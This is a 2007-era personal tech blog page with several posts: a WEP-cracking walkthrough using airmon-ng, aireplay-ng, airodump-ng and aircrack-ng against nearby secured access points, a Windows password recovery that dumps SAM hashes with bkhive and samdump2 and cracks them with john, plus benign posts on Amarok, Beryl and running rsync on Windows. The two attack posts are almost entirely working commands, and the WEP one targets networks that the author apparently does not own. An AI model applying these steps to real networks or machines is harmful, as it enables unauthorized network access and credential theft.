a Flo + a Blog = a Flog my ブログ

13Jul/071

Wifi-less no more

For the first time in my life, I happened to find myself without any wireless connectivity I could easily hook up to. I needed network-internet connectivity but around me only secured wifi Access Points.

I needed to find the key I lost.

How could I connect without knowing any of those WEP or WAP keys?

I suddently remember that I always have in my laptop CD pockets a very handy CD: backtrack 2. It is very convenient live CD that helps you solve a lot of nice things. It also have tools to scan wifi!

My ubuntu distro install did not have any of those tools installed so here I go, I reboot and run this live CD.

First you need to enable the monitor mode on your interface:

#airmon-ng start ath0

then just try to run a airodump to scan around

#airodump-ng ath0 out 0

If you get the wifi around you it means you are ready to play.

Once you see an AP with a decent power (closer to you), use aireplay to inject packets

#aireplay-ng -1 0 -e Target_ID -a MACoftheAP -h Your_MAC ath0

It will sending authentication requests and you should eventually get this:

Association successful ;-)

This means you are associated with the AP and ready to replay IVS.

you may want to run this association every X sec so you do not lose the AP connection.

This command will reassociate you every 20 secondes:

#aireplay-ng -1 20 -e Target_ID -a MACoftheAP -h Your_MAC ath0

So once associated, send packets as following. If you are not associated you see no send packet:

#aireplay-ng -3 -b MacoftheAP -h Your_MAC -x 600 ath0

You must also start airodump to capture replies, capture only the IVS to save space on the target channel:

#airodump-ng -w out --ivs --channel X ath0

aireplay will read:

Read 12345 packets (got 123 APR requests), sent 12345 packets...

You have to key sending until you get a lot of IVS (check airodump). If it stops sending, try reassociating with the AP.

Once you have a lot of IVS, you can start running aircrack. Just run it from another console as it can read the output file as it updates.

#aircrack-ng -x -0 out.ivs

When you see a "key found" message you are ready to get some network-internet connection.

Just enter:

#iwconfig ath0 mode Managed key XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX
#dhcpcd ath0

then a little ifconfig will confirm you are connect and able to get an ip from the AP. Voila! I was able to check what I needed and then go away.

Filed under: IT, xNix 1 Comment
6Jul/070

A quick and dirty Windows password recovery

Boot the Backtrack CD.

Change dir to your Windows mount point:
# cd /mnt/hda2/WINDOWS/system32/config
Copy the SAM and the system Registry hive to the temp dir:
# cp SAM /tmp
# cp system /tmp
Prepare our wordlist:
# cd /pentest/password/dictionaries/
# gunzip -c wordlist.txt.Z > /tmp/words.txt
# cd /tmp

As the Windows hashes (in the SAM file) are encrypted, we need this key (called bootkey) to decrypt the SAM hashes:
# bkhive system key
Now we can dump the password hashes out of the SAM file:
# samdump2 SAM key > /tmp/hashes.txt

Lets crack those hashes... the easiest way would be, if the password is in the wordlist, we use john for this case:
# john -w=words.txt -f=NT hashes.txt
No luck? Lets use the brute force method:
# john --incremental:all -f=NT hashes.txt

If this takes too long you could use ophcrack. This tool uses rainbow tables and should crack your hashes in a few seconds, but you need to download those rainbow tables (350mb or 700mb or you can generate them yourself) which are not included on the Backtrack cd (for a obvious reason...). Or you can use the oph online cracker, which should be quite fast.

Filed under: Windows, xNix No Comments
24Jun/070

Amarok feisty fix

Amarok is a nice media player for your ubuntu. it leaves your files alone (yeah!) and maintain its own database watching the directory you tell it to watch.

However, in Ubuntu Amarok has no mp3 support. This seems not to be installed automatically and needs to be done manually.

No worries, this is easy when you know where to look.

Amarok will freeze when you try to play any mp3 if you do not do this.

First, close any Amarok instance.

Go to /usr/lib/amarok, where you will find an install-mp3 file

Just run it. and voila! restart Amarok and there you are.

Oh I was talking about Amarok 1.4 .6 on Feisty.

Filed under: xNix No Comments
23Jun/070

switched to ubuntu

yes, I did the jump. Last night I turned my XP SP2 valliant box into a Ubuntu feisty box. I never really tries the live cd but read a few things about this distro.

So far I really like it. I have not tried all the things I used to do with my XP SP2. So far I just can miss my Densha de go simulation game but still think it might work with Wine.

I wanted to play for Xvid videos I had and BAAAM the player says, there is no codec installed for this, would you like to go search and install, clicked YES and the videos plays. It is really pleasant. really.

Today I want to try Beryl. This video really made me think about it.

Please make sure your card is supported for accelerated graphics. In a terminal type:

glxinfo | grep direct

If you get this output back, your card should work:

Direct rendering: Yes

If you get a "no" from this test, please install the correct driver.

To install the driver, use the Feisty's RestrictedDriversManager to install the Graphics card drivers. I like Feisty for that, every thing is easy.

Installing Beryl is as easy. Make sure you have multiverse [Repositories] enabled (Its on by default) and install using:

sudo apt-get install beryl beryl-manager emerald-themes

To run beryl, launch using the excecute windows (Alt+F2 then Enter)

beryl-manager

You may want to add Beryl to your start up if you really like it.

Add beryl-manager to the list of startup programs, by going to System -> Preferences -> Sessions, and under the tab Startup Programs and clicking New. Enter for both Name and Command arguments beryl-manager.

Misc: If you're still having issues visit the Ubuntu Wiki

Filed under: IT, xNix No Comments
27Dec/060

Installing RSYNC on Windows 2003/2000/NT.

rsync header

This document assumes that you want to install rsync as a daemon on a Windows NT/2000/2003 server or XP, without installing the entire cygwin suite.

You will need the following files:

From Cygwin:

From the Windows NT or 2000 Resource Kit. You also may want to read this kb as well.

  • instsrv.exe
  • srvany.exe
    For simplicity I have zipped them up in the previously mentioned package.

If you follow the following instructions you will an rsync service on your windows machine.
Please be careful where you place the server as any one who can see it can read from this service.

  1. Place rsync where you want to run it from.
    (I usually use C:\program files\rsync)
  2. Put the two dll's anywhere in the path, usually C:\winnt\system32 or c:\windows\system32 but for sure %windir%\system32.
  3. From a shell running in the directory containing instsrv and srvany type:
    (Replace C:\DirectoryContaining\ as appropriate)

    instsrv Rsync "C:DirectoryContainingsrvany.exesrvany.exe"
  4. You should now have a new service called Rsync and you can verify by looking in Start->Control Panel->Services (you can also open services.msc from a run command on 2000 or newer)
    DON'T START IT YET!
  5. If you want to run rsync in daemon mode you will need a configuration file. Here is the one I use, call it rsyncd.conf and place it in the same directory as rsync
    (C:\Program files\rsync\rsyncd.conf)

    use chroot = false
strict modes = false
hosts allow = *
log file = c:/rsyncd.log

[Repl]
path = C:/rsync/
read only = no

    (The command line to connect would look somthing like "rsync -avz server::BackupArea", where server is the name of the server running the rsync daemon.)
    The first two lines are important for rsync to work on Windows.

  6. You are going to need to hack some keys in the registry to make it work. Don't do this unless you are comfortable with the changes! Run regedit32 and add the following keys and values (quotation marks ARE IMPORTANT): 
    HKEY_LOCAL_MACHINE->SYSTEM->CurrentControlSet->Services->Rsync
Edit->Add Key->  Key Name: Parameters
Edit->Add Value->  Value Name: AppDirectory  Value: "C:Program Filesrsync"
Edit->Add Value->  Value Name: Application  Value: "C:Program Filesrsyncrsync.exe"
Edit->Add Value->  Value Name: AppParameters  Value: --config="C:Program Filesrsyncrsyncd.conf" --daemon --no-detach

    If you would like to add these keys automatically, there is a .reg file in the rsync.zip file hosted at the top. Just double click on rsync-param.reg

    Rsync server uses port 873 by default. You can update registry to specify a new port :

    [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesRsyncServerParameters]
"AppArgs"="--config rsyncd.conf --daemon --no-detach --port=new-port-number"

    Remember, unless you trust me implicitly, read the reg file and make sure you understand what it's doing before you run it, I will not be held responsible for idiots.

  7. You will probably have to open up the services control panel and double click on the Rsync service. Open the Log On tab and either change it to logon using the Local System account or edit the account information to a valid login account.
  8. That's it, you should be able to start and stop the rsync service at will using the Services Control Panel. When running with the above configuration you should be able to test by attempting to telnet to port 873 from a remote machine. telnet rsync.server.com 873 (replacing rsync.server.com with your own server's address and the port) You should get a connection to the rsync daemon running on your server.

Then you may want to use rsync on another machine to rsync something.

your rsync command will be in the following format (but not exactly this):

rsync -avz --delete --exclude '.Bad files' '/cygdrive/f/Public/toBakup' rsync://remoteserv:87/Repl

Let's break this command down. Here you're calling rsync using the -a, v, z options (archive, verbose and use compression, respectively). It should delete any files that exist on the destination that don't exist on the source(--delete), and it should exclude all files called '.Bad files' (--exclude, because we don't need to backup the annoying little system files). The file source is on the drive f: /cygdrive/f/Public/toBakup on the source and the destination as defined on the server remotesrv named Repl (see conf file) on port 87.

Once you do and hit Enter, rsync will spring into action, and start transferring the files on the source and mirroring them in the destination directory on your server. The -v switch (verbose) means you'll see all the action as it's happening. check the rsync man for more switches.

Like all good command line interaction, the secret sauce which bends rsync to your will lies in the usage switches you provide it in the rsync call (ie, rsync -avz). To see all the available options, type rsync -h at the command line. A few of the more interesting ones are:

-r, --recursive             recurse into directories
-u, --update                skip files that are newer on the receiver
-n, --dry-run               show what would have been transferred
--existing              only update files that already exist on receiver
--delete                delete files that don't exist on the sending side
-z, --compress              compress file data during the transfer
--exclude=PATTERN       exclude files matching PATTERN

If you're just getting started with rsync, the -n ("dry run") switch with -v (verbose) is a great way to see what files would get copied without actually performing the copy. Use that switch to test out your rsync recipe before you run it.

It runs well but a few questions remain:

Can it copy files in use?
How to preserve NTFS attributes?

I have found a few answers for the first one. The answer is quite simple: use VSS (volume shadow copy). go to the VSS MS ressource site and download the kit. Then you should be able to create Volume shadow in no time and copy files in use.

You would also like to read from the guy who wrote VSS:
Link to blog: http://blogs.msdn.com/adioltean
Link to first script: http://blogs.msdn.com/adioltean/archive/2005/01/20/357836.aspx
Link to second script: http://blogs.msdn.com/adioltean/archive/2005/01/05/346793.aspx
I am granting with an example I found:

SHADOWRSYNC.CMD

setlocal

@REM test if we are called by shadowrsync.cmd
if NOT "%CALLBACK_SCRIPT%"=="" goto :IS_CALLBACK

@REM
@REM Set these variables to what you need.
@REM SHADOW_DRIVE_LETTER is an existing drive you want to shadow
@REM
@REM MAP_SHADOW_TO needs to be either a drive letter that isn't
@REM currently in use, or an empty directory
@REM eg.  x:   or  c:tempshadowcopy
@REM

set SHADOW_DRIVE_LETTER=D:
set MAP_SHADOW_TO=X:

@REM
@REM Create the shadow copy - and generate env variables into a
temporary script.
@REM Then resursively come back into this script.

set CALLBACK_SCRIPT=%~dpnx0
set TEMP_GENERATED_SCRIPT=GeneratedTempScript.cmd

@echo ...Create the shadow copy...

vshadow.exe -nw -p -script=%TEMP_GENERATED_SCRIPT%
-exec=%CALLBACK_SCRIPT% %SHADOW_DRIVE_LETTER%

del /f %TEMP_GENERATED_SCRIPT%

@goto :EOF

:IS_CALLBACK
setlocal

@REM Get the vshadow temp variables.

call %TEMP_GENERATED_SCRIPT%

@REM Map the drive to the shadow copy
vshadow -el=%SHADOW_ID_1%,%MAP_SHADOW_TO%

@REM Now do your rsync thing
rsync   blah blah blah blah........

@REM Delete the shadow
vshadow -ds=%SHADOW_ID_1%

I still have to try this but I am sure it would work as it works for my backup software I usually use. In some way it looks like we are getting closer to DPM (Microsoft Data Protection Manager), a new MS software that almost continuously sync some contents for a user managed restore or for backup. maybe I should work on a GNU DPM eh!

I still have no answer about how to preserve NTFS attribute, since rsync is from the unix world and the NTFS mechanism is quite complex I am not they are very compatible. If only it were, this would be very useful for restore - just restore the data or switch to another server.

Filed under: En, IT, Windows, xNix No Comments
 « Newer Entries  Older Entries »

Twits

ING Direct Referal

Blogroll

Follow me

Jp

Kr

Languages

Sites of Mine